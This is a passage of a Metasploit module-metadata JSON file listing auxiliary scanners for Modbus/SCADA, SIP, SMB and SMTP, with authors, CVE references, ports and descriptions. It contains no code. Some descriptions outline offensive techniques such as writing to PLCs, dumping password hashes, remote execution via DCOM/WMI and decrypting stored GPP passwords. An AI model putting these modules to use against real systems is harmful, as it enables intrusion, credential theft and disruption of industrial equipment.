"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/scada/modbus_findunitid.rb",
"is_install_path": true,
"ref_name": "scanner/scada/modbus_findunitid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/modbusclient": {
"name": "Modbus Client Utility",
"full_name": "auxiliary/scanner/scada/modbusclient",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"EsMnemon <esm@mnemonic.no>",
"Arnaud SOULLIE <arnaud.soullie@solucom.fr>",
"Alexandrine TORRENTS <alexandrine.torrents@eurecom.fr>",
"Mathieu CHEVALIER <mathieu.chevalier@eurecom.fr>"
],
"description": "This module allows reading and writing data to a PLC using the Modbus protocol.\n This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond,\n as well as the mbtget perl script.",
"references": [
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/modbusclient.rb",
"is_install_path": true,
"ref_name": "scanner/scada/modbusclient",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/modbusdetect": {
"name": "Modbus Version Scanner",
"full_name": "auxiliary/scanner/scada/modbusdetect",
"rank": 300,
"disclosure_date": "2011-11-01",
"type": "auxiliary",
"author": [
"EsMnemon <esm@mnemonic.no>"
],
"description": "This module detects the Modbus service, tested on a SAIA PCD1.M2 system.\n Modbus is a clear text protocol used in common SCADA systems, developed\n originally as a serial-line (RS232) async protocol, and later transformed to IP,\n which is called ModbusTCP.",
"references": [
"URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx",
"URL-http://en.wikipedia.org/wiki/Modbus:TCP"
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/modbusdetect.rb",
"is_install_path": true,
"ref_name": "scanner/scada/modbusdetect",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/moxa_discover": {
"name": "Moxa UDP Device Discovery",
"full_name": "auxiliary/scanner/scada/moxa_discover",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrick DeSantis <p@t-r10t.com>"
],
"description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines.\n\n A discovery packet compels a Moxa device to respond to the sender\n with some basic device information that is needed for more advanced\n functions. The discovery data is 8 bytes in length and is the most\n basic example of the Moxa protocol. It may be sent out as a\n broadcast (destination 255.255.255.255) or to an individual device.\n\n Devices that respond to this query may be vulnerable to serious\n information disclosure vulnerabilities, such as CVE-2016-9361.\n\n The module is the work of Patrick DeSantis of Cisco Talos and is\n derived from original work by K. Reid Wightman. Tested and validated\n on a Moxa NPort 6250 with firmware versions 1.13 and 1.15.",
"references": [
"CVE-2016-9361",
"URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/",
"URL-http://www.moxa.com/support/faq/faq_detail.aspx?id=646"
],
"platform": "",
"arch": "",
"rport": 4800,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/moxa_discover.rb",
"is_install_path": true,
"ref_name": "scanner/scada/moxa_discover",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/pcomclient": {
"name": "Unitronics PCOM Client",
"full_name": "auxiliary/scanner/scada/pcomclient",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luis Rosa <lmrosa@dei.uc.pt>"
],
"description": "Unitronics Vision PLCs allow unauthenticated PCOM commands\n to query PLC registers.",
"references": [
"URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf"
],
"platform": "",
"arch": "",
"rport": 20256,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-02-08 19:22:48 +0000",
"path": "/modules/auxiliary/scanner/scada/pcomclient.rb",
"is_install_path": true,
"ref_name": "scanner/scada/pcomclient",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/profinet_siemens": {
"name": "Siemens Profinet Scanner",
"full_name": "auxiliary/scanner/scada/profinet_siemens",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tijl Deneut <tijl.deneut@howest.be>"
],
"description": "This module will use Layer2 packets, known as Profinet Discovery packets,\n to detect all Siemens (and sometimes other) devices on a network.\n It is perfectly SCADA-safe, as there will only be ONE single packet sent out.\n Devices will respond with their IP configuration and hostnames.\n Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be))",
"references": [
"URL-https://wiki.wireshark.org/PROFINET/DCP",
"URL-https://github.com/tijldeneut/ICSSecurityScripts"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/profinet_siemens.rb",
"is_install_path": true,
"ref_name": "scanner/scada/profinet_siemens",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/sielco_winlog_fileaccess": {
"name": "Sielco Sistemi Winlog Remote File Access",
"full_name": "auxiliary/scanner/scada/sielco_winlog_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability\n exists in the Runtime.exe service and can be triggered by sending a specially crafted packet\n to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite\n 2.07.14.",
"references": [
"CVE-2012-4356",
"OSVDB-83275",
"BID-54212",
"EDB-19409",
"URL-http://aluigi.altervista.org/adv/winlog_2-adv.txt"
],
"platform": "",
"arch": "",
"rport": 46824,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/scada/sielco_winlog_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/enumerator": {
"name": "SIP Username Enumerator (UDP)",
"full_name": "auxiliary/scanner/sip/enumerator",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Scan for numeric username/extensions using OPTIONS/REGISTER requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/enumerator.rb",
"is_install_path": true,
"ref_name": "scanner/sip/enumerator",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/enumerator_tcp": {
"name": "SIP Username Enumerator (TCP)",
"full_name": "auxiliary/scanner/sip/enumerator_tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Scan for numeric username/extensions using OPTIONS/REGISTER requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb",
"is_install_path": true,
"ref_name": "scanner/sip/enumerator_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/options": {
"name": "SIP Endpoint Scanner (UDP)",
"full_name": "auxiliary/scanner/sip/options",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for SIP devices using OPTIONS requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/options.rb",
"is_install_path": true,
"ref_name": "scanner/sip/options",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/options_tcp": {
"name": "SIP Endpoint Scanner (TCP)",
"full_name": "auxiliary/scanner/sip/options_tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for SIP devices using OPTIONS requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/options_tcp.rb",
"is_install_path": true,
"ref_name": "scanner/sip/options_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/sipdroid_ext_enum": {
"name": "SIPDroid Extension Grabber",
"full_name": "auxiliary/scanner/sip/sipdroid_ext_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Anibal Aguiar <anibal.aguiar@gmail.com>"
],
"description": "This module exploits a leak of extension/SIP Gateway\n on SIPDroid 1.6.1 beta, 2.0.1 beta, 2.2 beta (tested in Android 2.1 and 2.2 - official Motorola release)\n (other versions may be affected).",
"references": [
"BID-47710",
"URL-https://seclists.org/fulldisclosure/2011/May/83"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb",
"is_install_path": true,
"ref_name": "scanner/sip/sipdroid_ext_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/impacket/dcomexec": {
"name": "DCOM Exec",
"full_name": "auxiliary/scanner/smb/impacket/dcomexec",
"rank": 300,
"disclosure_date": "2018-03-19",
"type": "auxiliary",
"author": [
"beto",
"Marcello",
"Spencer McIntyre"
],
"description": "A similar approach to psexec but executing commands through DCOM. You\n can select different objects to be used to execute the commands.",
"references": [
"URL-https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/",
"URL-https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/",
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/dcomexec.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py",
"is_install_path": true,
"ref_name": "scanner/smb/impacket/dcomexec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"dcomexec.py"
]
}
},
"auxiliary_scanner/smb/impacket/secretsdump": {
"name": "DCOM Exec",
"full_name": "auxiliary/scanner/smb/impacket/secretsdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alberto Solino",
"Spencer McIntyre"
],
"description": "Performs various techniques to dump hashes from the remote machine\n without executing any agent there. For SAM and LSA Secrets (including\n cached creds) we try to read as much as we can from the registry and\n then we save the hives in the target system (%SYSTEMROOT%\\Temp dir) and\n read the rest of the data from there.",
"references": [
"URL-https://github.com/gentilkiwi/kekeo/tree/master/dcsync",
"URL-http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html",
"URL-http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html",
"URL-http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html",
"URL-http://www.quarkslab.com/en-blog+read+13",
"URL-https://code.google.com/p/creddump/",
"URL-http://lab.mediaservice.net/code/cachedump.rb",
"URL-http://insecurety.net/?p=768",
"URL-http://www.beginningtoseethelight.org/ntsecurity/index.htm",
"URL-http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf",
"URL-http://www.passcape.com/index.php?section=blog&cmd=details&id=15",
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py",
"is_install_path": true,
"ref_name": "scanner/smb/impacket/secretsdump",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"secretsdump.py"
]
}
},
"auxiliary_scanner/smb/impacket/wmiexec": {
"name": "WMI Exec",
"full_name": "auxiliary/scanner/smb/impacket/wmiexec",
"rank": 300,
"disclosure_date": "2018-03-19",
"type": "auxiliary",
"author": [
"beto",
"Spencer McIntyre"
],
"description": "A similar approach to psexec but executing commands through WMI.",
"references": [
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
"is_install_path": true,
"ref_name": "scanner/smb/impacket/wmiexec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"wmiexec.py"
]
}
},
"auxiliary_scanner/smb/pipe_auditor": {
"name": "SMB Session Pipe Auditor",
"full_name": "auxiliary/scanner/smb/pipe_auditor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what named pipes are accessible over SMB",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-03-22 06:41:58 +0000",
"path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
"is_install_path": true,
"ref_name": "scanner/smb/pipe_auditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/pipe_dcerpc_auditor": {
"name": "SMB Session Pipe DCERPC Auditor",
"full_name": "auxiliary/scanner/smb/pipe_dcerpc_auditor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what DCERPC services are accessible over a SMB pipe",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
"is_install_path": true,
"ref_name": "scanner/smb/pipe_dcerpc_auditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/psexec_loggedin_users": {
"name": "Microsoft Windows Authenticated Logged In Users Enumeration",
"full_name": "auxiliary/scanner/smb/psexec_loggedin_users",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis @R3dy__ <rdavis@accuvant.com>"
],
"description": "This module uses a valid administrator username and password to enumerate users\n currently logged in, using a similar technique than the \"psexec\" utility provided\n by SysInternals. It uses reg.exe to query the HKU base registry key.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-http://www.pentestgeek.com/2012/11/05/finding-logged-in-users-metasploit-module/",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
"is_install_path": true,
"ref_name": "scanner/smb/psexec_loggedin_users",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb1": {
"name": "SMBv1 Protocol Detection",
"full_name": "auxiliary/scanner/smb/smb1",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chance Johnson <Chance Johnson @loftwing>"
],
"description": "Detect systems that support the SMBv1 protocol",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-18 15:02:38 +0000",
"path": "/modules/auxiliary/scanner/smb/smb1.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb2": {
"name": "SMB 2.0 Protocol Detection",
"full_name": "auxiliary/scanner/smb/smb2",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect systems that support the SMB 2.0 protocol",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smb/smb2.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enum_gpp": {
"name": "SMB Group Policy Preference Saved Passwords Enumeration",
"full_name": "auxiliary/scanner/smb/smb_enum_gpp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua D. Abraham <jabra@praetorian.com>"
],
"description": "This module enumerates files from target domain controllers and connects to them via SMB.\n It then looks for Group Policy Preference XML files containing local/domain user accounts\n and passwords and decrypts them using Microsofts public AES key. This module has been\n tested successfully on a Win2k8 R2 Domain Controller.",
"references": [
"MSB-MS14-025",
"URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)",
"URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html",
"URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx",
"URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-09-10 15:04:22 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enum_gpp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enumshares": {
"name": "SMB Share Enumeration",
"full_name": "auxiliary/scanner/smb/smb_enumshares",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"nebulus",
"sinn3r <sinn3r@metasploit.com>",
"r3dy",
"altonjx"
],
"description": "This module determines what shares are provided by the SMB service and which ones\n are readable/writable. It also collects additional information such as share types,\n directories, files, time stamps, etc.\n\n By default, a netshareenum request is done in order to retrieve share information,\n but if this fails, you may also fall back to SRVSVC.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumshares",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enumusers": {
"name": "SMB User Enumeration (SAM EnumUsers)",
"full_name": "auxiliary/scanner/smb/smb_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what local users exist via the SAM RPC service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enumusers_domain": {
"name": "SMB Domain User Enumeration",
"full_name": "auxiliary/scanner/smb/smb_enumusers_domain",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"natron <natron@metasploit.com>",
"Joshua D. Abraham <jabra@praetorian.com>"
],
"description": "Determine what domain users are logged into a remote system via a DCERPC to NetWkstaUserEnum.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/aa370669%28VS.85%29.aspx"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumusers_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_login": {
"name": "SMB Login Check Scanner",
"full_name": "auxiliary/scanner/smb/smb_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module will test a SMB login on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0506"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_lookupsid": {
"name": "SMB SID User Enumeration (LookupSid)",
"full_name": "auxiliary/scanner/smb/smb_lookupsid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what users exist via brute force SID lookups.\n This module can enumerate both local and domain accounts by setting\n ACTION to either LOCAL or DOMAIN",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_lookupsid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_ms17_010": {
"name": "MS17-010 SMB RCE Detection",
"full_name": "auxiliary/scanner/smb/smb_ms17_010",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Sean Dillon <sean.dillon@risksense.com>",
"Luke Jennings"
],
"description": "Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.",
"references": [
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0146",
"CVE-2017-0147",
"CVE-2017-0148",
"MSB-MS17-010",
"URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
"URL-https://github.com/countercept/doublepulsar-detection-script",
"URL-https://technet.microsoft.com/en-us/library/security/ms17-010.aspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_ms17_010",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"DOUBLEPULSAR",
"ETERNALBLUE"
]
}
},
"auxiliary_scanner/smb/smb_uninit_cred": {
"name": "Samba _netr_ServerPasswordSet Uninitialized Credential State",
"full_name": "auxiliary/scanner/smb/smb_uninit_cred",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Richard van Eeden",
"sleepya",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module checks if a Samba target is vulnerable to an uninitialized variable creds vulnerability.",
"references": [
"CVE-2015-0240",
"OSVDB-118637",
"URL-https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/",
"URL-https://gist.github.com/worawit/33cc5534cb555a0b710b",
"URL-https://www.nccgroup.com/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_uninit_cred.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_uninit_cred",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_version": {
"name": "SMB Version Detection",
"full_name": "auxiliary/scanner/smb/smb_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Display version information about each system",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-05-07 00:13:11 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_version.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_enum": {
"name": "SMTP User Enumeration Utility",
"full_name": "auxiliary/scanner/smtp/smtp_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder@alligatorteam.org>",
"nebulus"
],
"description": "The SMTP service has two internal commands that allow the enumeration\n of users: VRFY (confirming the names of valid users) and EXPN (which\n reveals the actual address of users aliases and lists of e-mail\n (mailing lists)). Through the implementation of these SMTP commands can\n reveal a list of valid users.",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt",
"OSVDB-12551",
"CVE-1999-0531"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_ntlm_domain": {
"name": "SMTP NTLM Domain Extraction",
"full_name": "auxiliary/scanner/smtp/smtp_ntlm_domain",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Whitcroft <rwhitcroft@digitalboundary.net>"
],
"description": "Extract the Windows domain name from an SMTP NTLM challenge.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/cc246870.aspx"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_ntlm_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_relay": {
"name": "SMTP Open Relay Detection",
"full_name": "auxiliary/scanner/smtp/smtp_relay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Campbell Murray",
"xistence <xistence@0x90.nl>"
],
"description": "This module tests if an SMTP server will accept (via a code 250)\n an e-mail by using a variation of testing methods.\n Some of the extended methods will try to abuse configuration or mailserver flaws.",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt",
"URL-https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_relay",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_version": {
"name": "SMTP Banner Grabber",
"full_name": "auxiliary/scanner/smtp/smtp_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "SMTP Banner Grabber",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt"
],
